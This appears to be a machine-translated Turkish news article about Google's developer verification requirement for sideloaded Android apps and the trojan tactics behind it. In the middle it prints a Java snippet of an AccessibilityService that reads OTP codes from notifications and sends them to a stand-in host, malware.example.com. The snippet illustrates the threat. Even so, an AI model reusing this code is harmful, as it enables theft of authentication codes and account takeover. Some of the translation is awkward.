Android’in açık ekosistemi hem en büyük gücü hem de kalıcı bir güvenlik zorluğu oldu. Sideloading, geliştiricilere ve kullanıcılara benzersiz bir özgürlük sunarken, kötü amaçlı aktörlerin meşru uygulamalar olarak maskeyi dağıtması için bir vektör haline gelmiştir.
Geçtiğimiz yıl boyunca, Android geliştiricileri blog analistleri, internet sideload kaynakları aracılığıyla teslim edilen kötü amaçlı yazılımların, kullanıcıları finansal sahtekarlığa, veri hırsızlığına ve yetkisiz sistem erişimine maruz bırakarak oyun mağazası enfeksiyonlarını elliden fazla geride bıraktığını belirtti.
Bu saldırıların ölçeği, Google’ı sertifikalı Android cihazlarda geliştirici doğrulaması gerektirme teklifinde doruk noktaya gelen güvenliğin yan yükleme yaklaşımını yeniden düşünmeye itti.
Android için Ürün, Güven ve Büyüme Başkan Yardımcısı Suzanne Frey tarafından başlatılan Google’ın yeni doğrulama katmanı, bir havaalanındaki gezginler gibi geliştiricilere davranacak.
Süreç, uygulamanın içeriğini incelemeden bir geliştiricinin kimliğini doğrular ve kötü amaçlı uygulamalar farklı adlar altında yeniden ortaya çıktığında bile devam eden hesap verebilirlik oluşturur.
Android geliştiricileri blog analistleri, bu sistemin 2023’te tanıtılan başarılı oyun konsolu doğrulamasına dayandığını ve bunu Google Play dışında dağıtılan uygulamalara uyguladığını belirledi. Brezilya, Endonezya, Singapur ve Tayland’daki ilk denemeler, Eylül 2026’dan itibaren küresel sunumun takip edilmesiyle aşamalı hale gelecek.
Doğrulama süreci geliştirici dostu olacak şekilde tasarlanmıştır. Google, oyun dışı distribütörler için özel bir Android geliştirici konsolu piyasaya sürüyor, aerodinamik kimlik kontrolleri ve hobiler ve ticari ekipler için ayrı parçalar içeriyor.
Zaten Google Play’de bulunanların, mevcut Play Konsolu aracılığıyla doğrulamayı tamamlamış olan ek adımlara gerek yok. Geliştiriciler, Ekim 2025’te erken erişime kaydolarak, tartışma forumlarına katılarak ve deneyimi geliştirmek için geri bildirim sağlayarak hazırlanabilir.
Sideloaded uygulamalar tarafından sömürülen enfeksiyon mekanizması
Kötü niyetli kenar yüklü uygulamalar genellikle Android paket yükleyicinin güven varsayımlarından yararlanır.
Truva yükleri ile meşru APS’yi yeniden paketleyerek, saldırganlar iyi huylu imzaların ve standart kurulum istemlerinin arkasına saklanıyor. Kurulum üzerine bu Truva atları AccessibilityService API’ler, kullanıcı etkileşimini simüle ederek kendilerine ek izinler verir.
Örneğin, aşağıdaki snippet, bir Trojan’ın SMS mesajlarını kesmek ve kimlik doğrulama kodlarını püskürtmek için bir erişilebilirlik dinleyicisini nasıl kaydettiğini gösterir:-
public class SMSInterceptorService extends AccessibilityService {
@Override
public void onAccessibilityEvent(AccessibilityEvent event) {
if (event.getEventType() == AccessibilityEvent.TYPE_NOTIFICATION_STATE_CHANGED) {
List texts = event.getText();
for (CharSequence text : texts) {
if (text.toString().contains("OTP")) {
sendToC2(text.toString());
}
}
}
}
private void sendToC2(String message) {
// Exfiltrate using encrypted channel
HttpURLConnection conn = (HttpURLConnection) new URL("https://malware.example.com/collect").openConnection();
conn.setRequestMethod("POST");
conn.getOutputStream().write(encrypt(message));
}
} Doğrulanmış geliştirici kimliklerini uygulayarak Google, saldırı yaşam döngüsünü bozmayı amaçlamaktadır. Doğrulanmış kimlik bilgileri, tekrarlayan suçluların yayından kaldırmalardan kaçınmasını ve yeni fuarlar altında truva atlarını yeniden tanıtmasını önemli ölçüde zorlaştırıyor.
Bu açıklık ve hesap verebilirlik dengesi, Android güvenliğinde stratejik bir evrimi temsil eder ve yan yüklemenin güçlü ancak güvenli kalmasını sağlar.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.